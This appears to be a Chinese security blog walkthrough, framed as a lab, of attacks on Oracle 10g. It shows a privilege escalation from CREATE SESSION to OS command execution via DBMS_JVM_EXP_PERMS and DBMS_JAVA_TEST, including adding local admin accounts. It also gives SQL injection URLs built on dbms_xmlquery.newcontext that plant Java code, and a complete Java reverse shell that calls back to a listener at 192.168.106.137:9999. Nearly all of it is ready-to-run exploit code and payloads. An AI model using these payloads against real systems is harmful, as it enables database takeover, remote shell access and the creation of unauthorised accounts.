-- Lab fixture: a throwaway account holding nothing but CREATE SESSION, so the
-- escalation that follows starts from the weakest possible foothold.
-- Username == password is deliberate for the lab; never do this on a real instance.
CREATE USER xiaozi IDENTIFIED BY xiaozi;
GRANT CREATE SESSION TO xiaozi;
10g 低权限提升 — Oracle 10g: privilege escalation from an account that holds only CREATE SESSION (via DBMS_JVM_EXP_PERMS and DBMS_JAVA_TEST)
C:\Documents and Settings\Administrator>sqlplus xiaozi/xiaozi@orcl

SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 11月 2 00:30:37 2016

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL>
SQL> DECLARE
  2  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  3  CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;
  4  BEGIN
  5  OPEN C1;
  6  FETCH C1 BULK COLLECT INTO POL;
  7  CLOSE C1;
  8  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  9  END;
 10  /

PL/SQL 过程已成功完成。

SQL>
SQL> DECLARE
  2  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  3  CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;
  4  BEGIN
  5  OPEN C1;
  6  FETCH C1 BULK COLLECT INTO POL;
  7  CLOSE C1;
  8  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  9  END;
 10  /

PL/SQL 过程已成功完成。

SQL>
SQL> DECLARE
  2  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  3  CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;
  4  BEGIN
  5  OPEN C1;
  6  FETCH C1 BULK COLLECT INTO POL;
  7  CLOSE C1;
  8  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  9  END;
 10  /

PL/SQL 过程已成功完成。

SQL>
SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\windows\system32\cmd.exe', '/c', 'dir>c:\10gOUT.LST') FROM DUAL;

DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\WINDOWS\SYSTEM3
--------------------------------------------------------------------------------

SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\windows\system32\cmd.exe','/c','net user abc abc /add') FROM DUAL;

DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\WINDOWS\SYSTEM3
--------------------------------------------------------------------------------

What happened: the three anonymous blocks feed policy rows into DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS, which writes them into the Java policy without any check on the caller — a user holding nothing but CREATE SESSION thereby grants itself java.io.FilePermission 'execute' on <<ALL FILES>> plus the readFileDescriptor/writeFileDescriptor runtime permissions. DBMS_JAVA_TEST.FUNCALL then invokes oracle.aurora.util.Wrapper.main, which spawns cmd.exe inside the database server process, so both commands (the dir redirected to c:\10gOUT.LST, and net user abc abc /add) run as the OS account the Oracle service runs under — on Windows commonly LocalSystem or a local administrator. FUNCALL itself returns nothing useful (the blank result under the column header), so success is confirmed only by the side effects: the file appearing and the local account existing. Two preconditions must hold and should be checked before relying on this: the instance is an unpatched base release (10.2.0.1.0 here; Oracle addressed this DBMS_JVM_EXP_PERMS/DBMS_JAVA_TEST weakness in its 2010 Critical Patch Updates, so verify the target's patch level), and both packages are still executable by PUBLIC — if that grant has been revoked the first block fails with an insufficient-privileges error.
Oracle 10g web注入技巧 — Oracle 10g: from a web SQL injection point to OS command execution through Java stored procedures
-- Oracle 10g: from SQL injection to OS command execution via Java stored procedures.
-- Everything below executes with the privileges of the database account the web
-- application connects as. Creating a Java source / Java call spec needs the
-- CREATE PROCEDURE system privilege, and Runtime.exec() additionally needs the
-- java.io.FilePermission 'execute' grant that the previous section had to obtain
-- through DBMS_JVM_EXP_PERMS. Nothing here grants either, so this path only works
-- when the application account is already over-privileged (DBA- or JAVASYSPRIV-type
-- roles) — NOTE(review): verify that on the target before assuming the payloads run.

-- Step 1: a Java class that runs an arbitrary OS command. The Process returned by
-- exec() is never read, so execution is blind (no output, no exit status).
create or replace and resolve java source named JAVACMD as
import java.lang.*;
import java.io.*;
public class JAVACMD {
    public static void execmd(String command) throws IOException {
        Runtime.getRuntime().exec(command);
    }
}

-- Step 2: PL/SQL call specification exposing the Java method as a procedure.
create or replace procedure MYJAVACMD(command in varchar) as
language java name 'JAVACMD.execmd(java.lang.String)';

-- Step 3 (SQL*Plus): smoke test.
exec MYJAVACMD('net user');

-- The same three steps delivered through a numeric injection point.
-- dbms_xmlquery.newcontext() takes a PL/SQL block as a string and executes it, which
-- is what lets a SELECT-context injection run DDL; PRAGMA AUTONOMOUS_TRANSACTION is
-- required because DDL/commit are otherwise illegal inside a query. newcontext()
-- returns a handle, so "is not null" is true and a successful injection looks like
-- the unmodified page. Quoting: '' is one quote inside the outer literal, '''' is one
-- quote inside the execute-immediate string.
-- web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and resolve java source named JAVACMD as import java.lang.*;import java.io.*;public class JAVACMD{public static void execmd(String command) throws IOException{Runtime.getRuntime().exec(command);}} ''; commit; end;') from dual) is not null
-- web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace procedure MYJAVACMD(command in varchar) as language java name ''''JAVACMD.execmd(java.lang.String)''''; ''; commit;end;') from dual) is not null
-- web :http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('begin myjavacmd(''net user admin admin /add'') ;commit;end;') from dual) is not null
-- (The last payload leaves a local OS account "admin" behind; remove it when the
-- engagement ends.)

-- Step 4: interactive variant — a reverse shell. Connects back to addr:port, reads one
-- line at a time, runs it with Runtime.exec() and writes the command's stdout back; the
-- literal line "BYE" closes the session. Behaviour worth knowing before using it:
--   * only stdout is captured (p.getInputStream()); stderr is lost;
--   * `s` is reset to null before `s += msg`, so every reply begins with the text "null"
--     (and a command with no output yields just "null");
--   * if the listener closes the connection, readLine() returns null and the
--     NullPointerException from trim() is caught by the outer catch, ending the loop;
--   * a connect failure is only printed to the server's stdout (System.out), so from
--     the web side a failed callback is indistinguishable from success.
-- `len` is unused and DataInputStream.readLine() is deprecated; kept as in the original.
create or replace and compile java source named javasocket as
import java.net.*;
import java.io.*;
import java.lang.*;
public class javasocket {
    public static void test(String addr,String str_port) {
        Socket socket;
        String len;
        String s;
        InputStream Is;
        OutputStream Os;
        DataInputStream DIS;
        PrintStream PS;
        try{
            socket=new Socket(addr,Integer.parseInt(str_port));
            Is=socket.getInputStream();
            Os=socket.getOutputStream();
            DIS=new DataInputStream(Is);
            PS=new PrintStream(Os);
            while(true){
                s=DIS.readLine();
                if(s.trim().equals("BYE"))break;
                try{
                    Runtime rt = Runtime.getRuntime();
                    Process p = null;
                    p = rt.exec(s);
                    s = null;
                    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
                    String msg = null;
                    while((msg = br.readLine())!=null){
                        msg += " ";
                        s += msg;
                    }
                    br.close();
                } catch(Exception e) {
                    s = "Please check your command!";
                }
                PS.println(s);
            }
            DIS.close();
            PS.close();
            Is.close();
            Os.close();
            socket.close();
        } catch(Exception e) {
            System.out.println("Error:"+e);
        }
    }
}

-- Call spec for the reverse shell.
create or replace procedure myjavasocket(address in varchar,port in varchar) as
language java name 'javasocket.test(java.lang.String,java.lang.String)';

-- A listener must already be waiting on 192.168.106.137:9999 before this is run;
-- otherwise the Socket constructor throws and the call returns with nothing to show.
exec myjavasocket('192.168.106.137','9999');

-- Cleanup of the artifacts (SQL*Plus transcript; "Java 已删除。" / "过程已删除。" = dropped).
SQL> drop java source javasocket;
Java 已删除。
SQL> drop procedure myjavasocket;
过程已删除。

-- Reverse shell delivered through a numeric injection point. The trailing "--"
-- comments out whatever the application appends after the injected value.
-- http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream(); Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals("BYE"))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += " "; s += msg;}br.close();}catch(Exception e){s = "Please check your command!";}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
-- http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
-- http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--

-- 数字型和字符型,在于一个双引号的区别
-- (Numeric vs. string injection point: the only difference is one quote character —
-- note that it is a single quote ' closing the literal after id=7782, not a double
-- quote. In this variant every double-quoted Java string literal was also replaced by
-- null, which changes behaviour: "BYE" -> equals(null) is always false, so BYE no
-- longer ends the session; " " -> msg += null appends the text "null" to every output
-- line; the error message becomes the text "null". Presumably done to avoid sending "
-- through the injection point — confirm the target actually rejects it before
-- degrading the payload this way.)
-- http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream(); Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals(null))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += null; s += msg;}br.close();}catch(Exception e){s = null;}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
-- http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
-- http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考文章:
http://psoug.org/articles/Hacking-Aurora-in-Oracle-11g.htm/
http://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=B1A4B602FC83805EDBD9A0D0FA4E8D87?doi=10.1.1.210.3862&rep=rep1&type=pdf
https://www.notsosecure.com/hacking-oracle-11g/
http://www.tuicool.com/articles/QFvAFr